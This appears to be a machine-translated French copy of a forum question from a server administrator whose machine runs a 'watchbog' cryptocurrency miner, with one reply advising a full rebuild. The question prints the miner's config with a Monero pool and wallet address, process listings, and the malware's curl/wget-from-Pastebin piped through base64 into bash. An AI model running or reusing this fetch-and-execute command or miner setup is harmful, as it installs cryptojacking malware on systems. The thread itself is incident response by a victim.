web-dev-qa-db-fra.com

Un processus appelé ./watchbog est Mining Crypto Monnaie sur notre serveur. Comment puis-je l'arrêter?

J'ai trouvé cette question ci-dessous mais j'ai besoin de plus de clarification, c'est pourquoi j'écris à nouveau.

J'ai un processus appelé "Watchbog" qui collecte complètement mon CPU et je ne sais pas ce que c'est

J'ai donc fait des creuser et j'ai constaté qu'un exécutable est exécutable à partir de la /tmp répertoire. La structure de dossiers est quelque chose comme ceci:

/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data

Dans ce dossier, il y a deux fichiers, un exécutable watchbog qui est en cours d'exécution et un config.json. Ceci est le contenu du fichier de configuration,

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "id": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "asm": true,
    "autosave": true,
    "av": 0,
    "background": true,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": 3,
    "donate-level": 1,
    "huge-pages": false,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "pool.minexmr.com:443",
            "user": "4AbjKdQkedGZXvzm6VxMJb1zLB2CAmCmXdoCisRsQFAUPs4TWFePDUcZzk5ui4EdZXT3uaXXtssqPCoKQPTz7PeZNkKASkm.old",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": [
        {
            "low_power_mode": 1,
            "affine_to_cpu": false,
            "asm": true
        },
        {
            "low_power_mode": 1,
            "affine_to_cpu": false,
            "asm": true
        }
    ],
    "user-agent": null,
    "syslog": false,
    "watch": false
}

Mais la suppression des dossiers ne nous aide pas, ils sont recréés avec quelques secondes. J'ai donc essayé de voir quel autre processus courent et j'ai trouvé ces

solr     32616  0.0  0.0   4504   780 ?        Ss   13:10   0:00 /bin/sh -c (curl -fsSL https://Pastebin.com/raw/aGTSGJJp||wget -q -O- h
solr     32618  0.0  0.0  11224  2924 ?        S    13:10   0:00 bash
solr     32623  0.2  0.0  11644  3376 ?        S    13:10   0:00 /bin/bash
solr     32656  200  0.1 270204  6996 ?        Ssl  13:10   0:26 ./watchbog

L'URL Pastebin pointe vers une autre commande shell avec une autre commande shell avec une autre URL Pastebin.

(curl -fsSL https://Pastebin.com/raw/nMrfmnRa||wget -q -O- https://Pastebin.com/raw/nMrfmnRa) | base64 -d | /bin/bash

Cette seconde URL de Pastebin pointe vers un script shell codé de base64. Je ne peux pas l'inclure ici en raison de la limitation des personnages. Voici le lien: https://pastebin.com/raw/nmrfmnra

Je ne suis pas expert dans ce domaine, mais il semble que le script définit un travail cron qui télécharge à nouveau l'exécutable.

C'est tout ce que je pouvais trouver seul, quelqu'un peut-il s'il vous plaît guider sur la manière dont je peux arrêter tout cela ou que je devrais redéployer le serveur à nouveau?

malwareshellcode
3
Sayantan Das

De mon point de vue, il n'ya aucun moyen de dire si le reste du serveur est en sécurité ou non. Si j'étais vous, je hangais des fichiers pour enregistrer et recréer un nouveau serveur pour vous assurer qu'il n'est pas compromis. Sinon, vous pourriez vous retrouver comme BlankMediaGames et avoir des fichiers de fuir des années plus tard. Mieux sûr que désolé

5
Thryn